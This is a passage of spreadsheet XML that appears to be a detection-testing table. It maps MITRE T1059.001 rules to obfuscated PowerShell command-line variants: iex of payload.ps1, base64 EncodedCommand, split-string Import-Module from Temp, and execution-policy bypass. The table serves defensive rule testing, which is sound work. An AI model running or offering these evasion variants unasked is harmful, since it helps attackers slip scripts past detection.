      <c r="A4495" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C4495" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D4495" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E4495" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; (cat C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F4495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4495" s="43" t="n"/>
      <c r="J4495" s="43" t="n"/>
      <c r="K4495" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4496" ht="15.75" customHeight="1" s="42">
      <c r="A4496" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4496" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C4496" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D4496" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E4496" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "[scriptblock]::Create((cat C:\temp\payload.ps1 -raw)).Invoke()"</t>
        </is>
      </c>
      <c r="F4496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4496" s="43" t="n"/>
      <c r="J4496" s="43" t="n"/>
      <c r="K4496" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4497" ht="15.75" customHeight="1" s="42">
      <c r="A4497" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C4497" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D4497" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E4497" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "[scriptblock]::Create((cat C:\temp\payload.ps1 -raw)).Invoke()"</t>
        </is>
      </c>
      <c r="F4497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4497" s="43" t="n"/>
      <c r="J4497" s="43" t="n"/>
      <c r="K4497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4498" ht="15.75" customHeight="1" s="42">
      <c r="A4498" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4498" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C4498" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D4498" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E4498" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex (gc C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F4498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4498" s="43" t="n"/>
      <c r="J4498" s="43" t="n"/>
      <c r="K4498" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4499" ht="15.75" customHeight="1" s="42">
      <c r="A4499" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4499" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C4499" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D4499" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E4499" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex (Get-Content C:\temp\payload.ps1 -ra)"</t>
        </is>
      </c>
      <c r="F4499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4499" s="43" t="n"/>
      <c r="J4499" s="43" t="n"/>
      <c r="K4499" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4500" ht="15.75" customHeight="1" s="42">
      <c r="A4500" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4500" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C4500" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D4500" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E4500" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F4500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4500" s="43" t="n"/>
      <c r="J4500" s="43" t="n"/>
      <c r="K4500" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4501" ht="15.75" customHeight="1" s="42">
      <c r="A4501" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4501" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C4501" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D4501" s="43" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E4501" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d2hvYW1p'))|  iex"</t>
        </is>
      </c>
      <c r="F4501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4501" s="43" t="n"/>
      <c r="J4501" s="43" t="n"/>
      <c r="K4501" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4502" ht="15.75" customHeight="1" s="42">
      <c r="A4502" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4502" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4502" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4502" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4502" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp;('Im'+'port-Module') " $Env:Temp\suspicious_module.psm1""</t>
        </is>
      </c>
      <c r="F4502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4502" s="43" t="n"/>
      <c r="J4502" s="43" t="n"/>
      <c r="K4502" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4503" ht="15.75" customHeight="1" s="42">
      <c r="A4503" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4503" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4503" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4503" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4503" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp;('Im'+'port-Module') " $Env:Temp\suspicious_module.psm1""</t>
        </is>
      </c>
      <c r="F4503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4503" s="43" t="n"/>
      <c r="J4503" s="43" t="n"/>
      <c r="K4503" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4504" ht="15.75" customHeight="1" s="42">
      <c r="A4504" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4504" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4504" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4504" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4504" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "&amp;('Im'+'port-Module') " $Env:Temp\suspicious_module.psm1""</t>
        </is>
      </c>
      <c r="F4504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4504" s="43" t="n"/>
      <c r="J4504" s="43" t="n"/>
      <c r="K4504" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4505" ht="15.75" customHeight="1" s="42">
      <c r="A4505" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4505" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4505" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4505" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4505" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp;('Im'+'port-Module') " $Env:Temp\suspicious_module.psm1""</t>
        </is>
      </c>
      <c r="F4505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4505" s="43" t="n"/>
      <c r="J4505" s="43" t="n"/>
      <c r="K4505" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4506" ht="15.75" customHeight="1" s="42">
      <c r="A4506" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4506" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4506" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4506" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "&amp;('Im'+'port-Module') " $Env:Temp\suspicious_module.psm1""</t>
        </is>
      </c>
      <c r="F4506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4506" s="43" t="n"/>
      <c r="J4506" s="43" t="n"/>
      <c r="K4506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4507" ht="15.75" customHeight="1" s="42">
      <c r="A4507" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4507" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4507" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4507" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4507" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F4507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4507" s="43" t="n"/>
      <c r="J4507" s="43" t="n"/>
      <c r="K4507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4508" ht="15.75" customHeight="1" s="42">
      <c r="A4508" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4508" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4508" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4508" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4508" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F4508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4508" s="43" t="n"/>
      <c r="J4508" s="43" t="n"/>
      <c r="K4508" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4509" ht="15.75" customHeight="1" s="42">
      <c r="A4509" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4509" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4509" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4509" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4509" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F4509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4509" s="43" t="n"/>
      <c r="J4509" s="43" t="n"/>
      <c r="K4509" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4510" ht="15.75" customHeight="1" s="42">
      <c r="A4510" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C4510" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D4510" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E4510" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F4510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4510" s="43" t="n"/>
      <c r="J4510" s="43" t="n"/>
      <c r="K4510" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4511" ht="15.75" customHeight="1" s="42">
      <c r="A4511" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4511" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4511" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4511" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4511" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F4511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4511" s="43" t="n"/>
      <c r="J4511" s="43" t="n"/>
      <c r="K4511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4512" ht="15.75" customHeight="1" s="42">
      <c r="A4512" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4512" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4512" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4512" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4512" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F4512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4512" s="43" t="n"/>
      <c r="J4512" s="43" t="n"/>
      <c r="K4512" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4513" ht="15.75" customHeight="1" s="42">
      <c r="A4513" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4513" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4513" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4513" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4513" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F4513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4513" s="43" t="n"/>
      <c r="J4513" s="43" t="n"/>
      <c r="K4513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4514" ht="15.75" customHeight="1" s="42">
      <c r="A4514" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4514" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4514" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4514" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F4514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4514" s="43" t="n"/>
      <c r="J4514" s="43" t="n"/>
      <c r="K4514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4515" ht="15.75" customHeight="1" s="42">
      <c r="A4515" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4515" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4515" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4515" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -"f" "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F4515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4515" s="43" t="n"/>
      <c r="J4515" s="43" t="n"/>
      <c r="K4515" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4516" ht="15.75" customHeight="1" s="42">
      <c r="A4516" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4516" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4516" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4516" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"f" "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F4516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4516" s="43" t="n"/>
      <c r="J4516" s="43" t="n"/>
      <c r="K4516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4517" ht="15.75" customHeight="1" s="42">
      <c r="A4517" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4517" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4517" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4517" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ep" bypass -"f" "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F4517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4517" s="43" t="n"/>
      <c r="J4517" s="43" t="n"/>
      <c r="K4517" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4518" ht="15.75" customHeight="1" s="42">
      <c r="A4518" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4518" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4518" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4518" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ep" bypass -f "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F4518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4518" s="43" t="n"/>
      <c r="J4518" s="43" t="n"/>
      <c r="K4518" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4519" ht="15.75" customHeight="1" s="42">
      <c r="A4519" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4519" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4519" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4519" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"file" "C:\Users\Default\..\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F4519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4519" s="43" t="n"/>
      <c r="J4519" s="43" t="n"/>
      <c r="K4519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4520" ht="15.75" customHeight="1" s="42">
      <c r="A4520" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4520" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4520" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4520" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"file" "C:\Users\Default\..\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F4520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4520" s="43" t="n"/>
      <c r="J4520" s="43" t="n"/>
      <c r="K4520" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4521" ht="15.75" customHeight="1" s="42">
      <c r="A4521" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4521" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4521" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4521" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4521" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ex" Bypass -f script.ps1</t>
        </is>
      </c>
      <c r="F4521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4521" s="43" t="n"/>
      <c r="J4521" s="43" t="n"/>
      <c r="K4521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4522" ht="15.75" customHeight="1" s="42">
      <c r="A4522" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4522" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4522" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4522" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ex Bypass /"File" script.ps1</t>
        </is>
      </c>
      <c r="F4522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4522" s="43" t="n"/>
      <c r="J4522" s="43" t="n"/>
      <c r="K4522" s="43" t="b">
